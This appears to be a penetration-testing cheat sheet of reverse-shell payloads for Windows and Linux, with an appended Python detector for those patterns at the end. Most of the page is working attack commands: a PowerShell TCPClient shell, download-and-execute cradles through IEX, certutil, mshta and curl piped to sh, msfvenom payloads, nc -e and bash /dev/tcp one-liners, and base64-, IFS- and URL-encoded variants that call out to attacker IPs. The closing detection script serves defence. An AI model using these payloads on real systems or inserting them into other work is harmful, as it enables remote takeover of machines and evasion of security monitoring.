Payloads (Reverse shell)


Last updated 6 months ago


Windows

Powershell

simple payload, base64-encoded for powershell -e (the Unicode encoder produces UTF-16LE bytes, which is what -EncodedCommand expects)

PS> $Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.119.3",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

PS> $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)

PS> $EncodedText = [Convert]::ToBase64String($Bytes)

PS> $EncodedText
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0
...
AYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA

PS> exit

Fileless Method

"cmd /c powershell IEX(New-Object Net.WebClient).DownloadString('http://IP/Invoke-PowerShellTcp.ps1')"

powershell "IEX(New-Object Net.WebClient).DownloadString('http://IP/Invoke-PowerShellTcp.ps1')"

vbs

CreateObject("WScript.Shell").Run "powershell -ep bypass -w hidden IEX (New-Object System.Net.Webclient).DownloadString('http://10.8.0.173:9001/revshell.txt')"

Set oShell = CreateObject("Wscript.Shell")
oShell.run "cmd.exe /c curl 10.8.0.136/nc64.exe -o C:\Windows\Temp\nc64.exe"
oShell.run "cmd.exe /c C:\Windows\Temp\nc64.exe 10.8.0.136 2222 -e cmd.exe"

Powercat

URL encode powercat

%3BIEX%20(New-Object%20System.Net.Webclient).DownloadString(%22http%3A%2F%2F192.168.119.3%2Fpowercat.ps1%22)%3Bpowercat%20-c%20192.168.119.3%20-p%204444%20-e%20powershell

download and execute

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.168/powercat.ps1');powercat -c 192.168.45.168 -p 443 -e powershell

HTA

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.40.130 LPORT=443 -f hta-psh -o thm.hta

mshta.exe http://IP-Server/thm.hta

SMB

smbserver.py -smb2support evil $PWD

#UNC path to the binary on the share
//192.168.45.169/evil/shell.exe

MsfVenom

x64

#exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.185 LPORT=8002 -f exe -o shell.exe

certutil.exe -f -urlcache http://192.168.45.153/shell.exe C:\wamp\www\shell.exe

x86

#exe
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.154 LPORT=80 -f exe -o shell.exe

certutil.exe -f -urlcache http://192.168.45.153/shell.exe C:\wamp\www\shell.exe

webshells

#asp / php
msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f asp
msfvenom -p php/reverse_php LHOST= LPORT= -f raw > shell.php

#aspx reverse shell
msfvenom -p windows/x64/shell_reverse_tcp -ax64 -f aspx LHOST=10.8.0.173 LPORT=9002 > daz.aspx

Socat

rlwrap nc -lnvp $port
socat.exe TCP4:$ip:$port EXEC:'cmd.exe',pipes

Nishang reverse shell powershell

powershell "IEX(New-Object Net.WebClient).DownloadString('http://192.168.49.140/Invoke-PowerShellTcp.ps1')"

encode it in base64

echo "powershell \"IEX(New-Object Net.WebClient).DownloadString('http://192.168.45.153/Invoke-PowerShellTcp.ps1')\"" > shell.txt

cat shell.txt | iconv -t utf-16le | base64 -w0;echo
powershell -e [put base64 here]

This makes it better than alternatives such as the shell generator on reverseshell.com, whose payloads display errors instead of redirecting them to null.

nc

CMD='.\\\\nc.exe 192.168.45.5 443 -e cmd.exe'

Linux

Common

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExOC4yNS80NDQ0IDA+Jg== | base64 -d

<?php echo shell_exec('bash -i >& /dev/tcp/10.11.0.106/443 0>&1');?>

#1 works in most cases
busybox nc 192.168.45.153 80 -e /bin/sh

#2
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 443 >/tmp/f

#3 base64-encoded payload (e.g. passed in a URL)
echo {PAYLOAD} | base64 -d | bash

#4 using curl
curl http://IP:8000/shell.sh -o /tmp/shell.sh
chmod +x /tmp/shell.sh
/bin/bash /tmp/shell.sh

#5 generate an ELF file
msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp -f elf -o shell.elf

encoded payload

echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjAuMTM2LzIyMjIgMD4mMQo=${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash

#Rev-shell URL encoded
%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.45.160%2F8001%200%3E%261%27

Fileless Method

echo "bash -c 'bash -i >& /dev/tcp/192.168.45.160/8001 0>&1'" > pwn.sh

curl -L http://10.10.10.1/pwn.sh | sh
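Defender's view of the encodings used throughout this page (added example, not part of the cheat sheet): the PowerShell -e blobs are base64 over UTF-16LE, and the Linux payloads above hide behind ${IFS}, URL-encoding and echo | base64 -d. The script below normalises such command lines, as they appear in Sysmon Event ID 1 or auditd EXECVE records, and then flags the reverse-shell patterns this page lists (/dev/tcp, nc -e, mkfifo pipes, TCPClient, download cradles, socat EXEC, mshta, curl | sh). The indicator names, the 203.0.113.x addresses and the sample command lines are constructed for the example; the two encoded strings are taken from this page.

```python
"""Normalise obfuscated command lines and flag reverse-shell indicators.

Added example (not from the cheat sheet). Input: process-creation command
lines. Handles the encodings the page uses: ${IFS} as a space substitute,
URL-encoding, powershell -e (base64 of UTF-16LE) and echo <b64> | base64 -d.
"""
import base64
import re
from urllib.parse import unquote

# powershell -e / -ec / -enc / -EncodedCommand <base64>
_PS_ENCODED = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
# echo <base64> | base64 -d
_B64_PIPE = re.compile(r"echo\s+(?:-n\s+)?([A-Za-z0-9+/=]{16,})\s*\|\s*base64\s+(?:-d|--decode)")

# Indicator name -> regex, one per technique on the page (names are ours)
INDICATORS = {
    "bash_dev_tcp": re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
    "nc_exec": re.compile(r"\bnc(?:64)?(?:\.exe)?\b.*\s-e\s+(?:/bin/(?:ba)?sh|cmd(?:\.exe)?|powershell)"),
    "mkfifo_pipe": re.compile(r"mkfifo\s+\S+.*\|\s*nc\b"),
    "dotnet_tcpclient": re.compile(r"(?i)System\.Net\.Sockets\.TCPClient"),
    "download_cradle": re.compile(r"(?i)IEX\s*\(?\s*New-Object\s+(?:System\.)?Net\.WebClient\)?\.DownloadString"),
    "socat_exec": re.compile(r"(?i)\bsocat\b.*TCP4?:.*EXEC:"),
    "mshta_remote": re.compile(r"(?i)\bmshta(?:\.exe)?\s+https?://"),
    "curl_pipe_sh": re.compile(r"\bcurl\b.*\|\s*(?:ba)?sh\b"),
}


def encode_powershell(script):
    """Encode as powershell -e expects: base64 over UTF-16LE (used only to build fixtures)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell_encoded(b64):
    """Reverse of encode_powershell; None if the blob is not valid UTF-16LE base64."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def normalise(cmdline):
    """Strip the page's encodings so the indicator regexes see plain text.

    Decoded payloads are appended rather than substituted, so the original
    evidence (the -e flag, the base64 pipe) stays visible as well.
    """
    text = cmdline.replace("${IFS}", " ").replace("$IFS", " ")
    if "%" in text:
        text = unquote(text)
    m = _PS_ENCODED.search(text)
    if m:
        decoded = decode_powershell_encoded(m.group(1))
        if decoded:
            text += " " + decoded
    for m in _B64_PIPE.finditer(text):
        try:
            text += " " + base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:
            pass
    return text


def find_indicators(cmdline):
    """Sorted indicator names that fire on the normalised command line."""
    text = normalise(cmdline)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


# Constructed sample command lines. The first two are the page's own encoded
# payloads; the rest use RFC 5737 documentation addresses.
SAMPLE_CMDLINES = {
    "ifs_b64": "echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjAuMTM2LzIyMjIgMD4mMQo=${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash",
    "url_encoded": "%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.45.160%2F8001%200%3E%261%27",
    "ps_encoded": "powershell -w hidden -e "
    + encode_powershell('$client = New-Object System.Net.Sockets.TCPClient("203.0.113.5",4444)'),
    "ps_benign": "powershell -e " + encode_powershell("Get-Process | Sort-Object CPU"),
    "busybox_nc": "busybox nc 203.0.113.5 80 -e /bin/sh",
}

if __name__ == "__main__":
    for name, cmd in SAMPLE_CMDLINES.items():
        print(f"{name:12s} -> {find_indicators(cmd)}")
```

Appending the decoded text rather than replacing it keeps both the encoded form and the plaintext available to the rules, so a hit can be attributed to the original event without re-running the decoder; for bulk triage, feed each CommandLine field to find_indicators and keep the non-empty results.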